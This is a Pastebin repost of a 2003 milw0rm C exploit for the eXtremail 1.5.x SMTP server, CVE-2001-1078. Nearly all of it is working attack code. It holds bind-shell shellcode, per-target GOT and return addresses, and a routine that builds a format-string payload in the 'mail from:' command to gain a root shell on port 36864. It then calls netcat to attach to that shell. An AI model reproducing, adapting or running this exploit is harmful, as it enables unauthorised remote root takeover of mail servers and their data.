Advertisement
FlyFar

eXtremail 1.5.x (Linux) - Remote Format Strings - CVE-2001-1078

Jan 27th, 2024
722
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.75 KB | Cybersecurity | 0 0
  1. /****************************************************************/
  2. /*      Linux eXtremail 1.5.x Remote Format Strings Exploit                 */
  3. /*                                                                                                  */
  4. /*                          */
  5. /*                                 By B-r00t - 02/07/2003           */
  6. /*                          */
  7. /*  Versions:       Linux eXtremail-1.5-8 => VULNERABLE     */
  8. /*          Linux eXtremail-1.5-5 => VULNERABLE     */
  9. /*  Exploit uses format strings bug in fLog() of smtpd to bind a    */
  10. /*  r00tshell to port 36864 on the target eXtremail server.     */
  11. /*                          */
  12. /****************************************************************/
  13.  
  14. #include <stdlib.h>
  15. #include <stdio.h>
  16. #include <string.h>
  17. #include <sys/types.h>
  18. #include <sys/socket.h>
  19. #include <netinet/in.h>
  20. #include <arpa/inet.h>
  21. #include <unistd.h>
  22.  
  23. #define EXPLOIT "eXtreme"
  24. #define DEST_PORT 25
  25.  
  26. // Prototypes
  27. int get_sock (char *host);
  28. int send_sock (char *stuff);
  29. int read_sock (void);
  30. void usage (void);
  31. int do_it (void);
  32.  
  33. // Globals
  34. int socketfd, choice;
  35. unsigned long GOT, RET;
  36. char *myip;
  37. char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
  38. char shellcode[] =
  39. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  40. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  41. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  42. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  43. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  44. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  45. "\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
  46. "\x40\x89\xc3\x89\x46\x0c\x40\x89"
  47. "\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
  48. "\x80\x43\xc6\x46\x10\x10\x88\x46"
  49. "\x08\x31\xc0\x31\xd2\x89\x46\x18"
  50. "\xb0\x90\x66\x89\x46\x16\x8d\x4e"
  51. "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
  52. "\x66\xcd\x80\x89\x5e\x0c\x43\x43"
  53. "\xb0\x66\xcd\x80\x89\x56\x0c\x89"
  54. "\x56\x10\xb0\x66\x43\xcd\x80\x86"
  55. "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
  56. "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
  57. "\x80\x88\x56\x07\x89\x76\x0c\x87"
  58. "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
  59. "\xe8\x8d\xff\xff\xff\x2f\x62\x69"
  60. "\x6e\x2f\x73\x68";
  61.  
  62.  
  63. struct {
  64.         char *systemtype;
  65.         unsigned long got;
  66.         unsigned long ret;
  67.         int pad;
  68.         int buf;
  69.         int pos;
  70. } targets[] = {
  71.     // Confirmed targets tested by B-r00t.
  72.         { "RedHat 7.2 eXtremail V1.5 release 5
  73. (eXtremail-1.5-5.i686.rpm)",   0x0813b19c, 0xbefff1e8, 1, 266, 44},
  74.         { "Linux ANY eXtremail V1.5 release 5
  75. (eXtremail-1.5-5.tar.gz)",   0x0813b19c, 0xbefff1b8, 1, 266, 44},
  76.     { "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",   0xbefff0c8,
  77. 0xbefff1d4, 1, 266, 44},
  78.         { "eXtremail V1.5 DEBUG",   0x44434241, 0xaaaaaaaa, 1, 266,
  79. 44},
  80.         { 0 }
  81.     };
  82.  
  83. int main ( int argc, char *argv[] )
  84. {
  85. char *TARGET = "TARGET";
  86.  
  87. printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n",
  88. EXPLOIT);
  89.  
  90. if (argc < 3)
  91. usage ();
  92.  
  93. choice = atoi(argv[2]);
  94. if (choice < 0 || choice > 3)
  95. usage ();
  96.  
  97. setenv (TARGET, argv[1], 1);
  98.  
  99. get_sock(argv[1]);
  100. sleep (1);
  101. read_sock ();
  102. sleep (1);
  103. send_sock (helo);
  104. sleep (1);
  105. read_sock ();
  106. sleep(1);
  107. do_it ();
  108. }
  109.  
  110.  
  111. void usage (void)
  112. {
  113.         int loop;
  114.     printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
  115.         printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
  116.     for (loop = 0; targets[loop].systemtype; loop++)
  117.             printf ("\n%d\t%s", loop, targets[loop].systemtype);
  118.         printf ("\n\nOn success a r00tshell will be spawned on port
  119. 36864.\n\n");
  120.     exit (-1);
  121.         }
  122.  
  123.  
  124. int get_sock (char *host)
  125. {
  126. struct sockaddr_in dest_addr;
  127.  
  128. if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  129.         perror("Socket Error!\n");
  130.         exit (-1);
  131.         }
  132.  
  133. dest_addr.sin_family = AF_INET;
  134. dest_addr.sin_port = htons(DEST_PORT);
  135. if (! inet_aton(host, &(dest_addr.sin_addr))) {
  136.         perror("inet_aton problems\n");
  137.         exit (-2);
  138.         }
  139.  
  140. memset( &(dest_addr.sin_zero), '\0', 8);
  141. if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
  142. sockaddr)) == -1){
  143.         perror("Connect failed!\n");
  144.         close (socketfd);
  145.         exit (-3);
  146.         }
  147. printf ("\n\nConnected to %s\n", host);
  148. }
  149.  
  150.  
  151.  
  152. int send_sock (char *stuff)
  153. {
  154.     int bytes;
  155.         bytes = (send (socketfd, stuff, strlen(stuff), 0));
  156.         if (bytes == -1) {
  157.         perror("Send error");
  158.         close (socketfd);
  159.         exit(4);
  160.     }
  161. printf ("Send:\t%s", stuff);
  162. return bytes;
  163. }
  164.  
  165.  
  166. int read_sock (void)
  167. {
  168.         int bytes;
  169.     char buffer[200];
  170.     char *ptr;
  171.     ptr = buffer;
  172.     memset (buffer, '\0', sizeof(buffer));
  173.         bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
  174.         if (bytes == -1) {
  175.         perror("send error");
  176.         close (socketfd);
  177.         exit(4);
  178.     }
  179. printf ("Recv:\t%s", buffer);
  180. return bytes;
  181. }
  182.  
  183.  
  184. int do_it (void)
  185. {
  186. char format[200], buf[500], *bufptr, *p;
  187. int loop, sofar = 0;
  188. int PAD = targets[choice].pad;
  189. int POS = targets[choice].pos;
  190. unsigned char r[3], g[3], w[3];
  191.  
  192. RET = targets[choice].ret;
  193. r[0] = (int) (RET & 0x000000ff);
  194. r[1] = (int)((RET & 0x0000ff00) >> 8);
  195. r[2] = (int)((RET & 0x00ff0000) >> 16);
  196. r[3] = (int)((RET & 0xff000000) >> 24);
  197.  
  198. GOT = targets[choice].got;
  199. g[0] = (int) (GOT & 0x000000ff);
  200. g[1] = (int)((GOT & 0x0000ff00) >> 8);
  201. g[2] = (int)((GOT & 0x00ff0000) >> 16);
  202. g[3] = (int)((GOT & 0xff000000) >> 24);
  203.  
  204.  
  205. // Start buf
  206. bufptr = buf;
  207. bzero (bufptr, sizeof(buf));
  208. strncpy (buf, "mail from: ", strlen("mail from: "));
  209. sofar = 19;
  210.  
  211. // Do padding
  212. for (loop=0; loop<PAD; loop++)
  213. strncat (buf, "a", 1);
  214. sofar = sofar+PAD;
  215.  
  216. //1st GOT addy
  217. strncat (buf, g, 4);
  218.  
  219. //2nd GOT addy
  220. p = &g[0];
  221. (*p)++;
  222. strncat (buf, g, 4);
  223.  
  224. // 3rd GOT addy
  225. p = &g[0];
  226. (*p)++;
  227. strncat (buf, g, 4);
  228.  
  229. // 4th GOT addy
  230. p = &g[0];
  231. (*p)++;
  232. strncat (buf, g, 4);
  233. sofar = sofar+16;
  234.  
  235. for (loop=0; loop<4; loop++) {
  236.             if (r[loop] > sofar) {
  237.                         w[loop] = r[loop]-sofar;
  238.                         } else
  239.             if (r[loop] == sofar) {
  240.                         w[loop] = 0;
  241.                         }else
  242.             if (r[loop] < sofar) {
  243.                         w[loop] = (256-sofar)+r[loop];
  244.                         }
  245.             sofar = sofar+w[loop];
  246.             }
  247.  
  248. bufptr = format;
  249. bzero (bufptr, sizeof(format));
  250. sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
  251. w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
  252. strncat (buf, format, sizeof(format));
  253. strncat (buf, shellcode, sizeof(shellcode));
  254.  
  255. // Summarise
  256. printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
  257. printf ("\nWrite Addy:\t\t0x%x", GOT);
  258. printf ("\nRET (shellcode):\t0x%x", RET);
  259. printf ("\nPAD (alignment):\t%d", PAD);
  260. printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
  261. targets[choice].buf);
  262. printf ("\nSending it ... \n");
  263. sleep(1);
  264.  
  265. // Ok lets Wack it!
  266. send_sock (buf);
  267. sleep (1);
  268. close (socketfd);
  269. printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864
  270. ....!!!!!\n\n\n");
  271. sleep(3); // May take time to spawn a shell
  272. system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
  273. exit (0);
  274. }
  275.  
  276. // milw0rm.com [2003-07-02]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement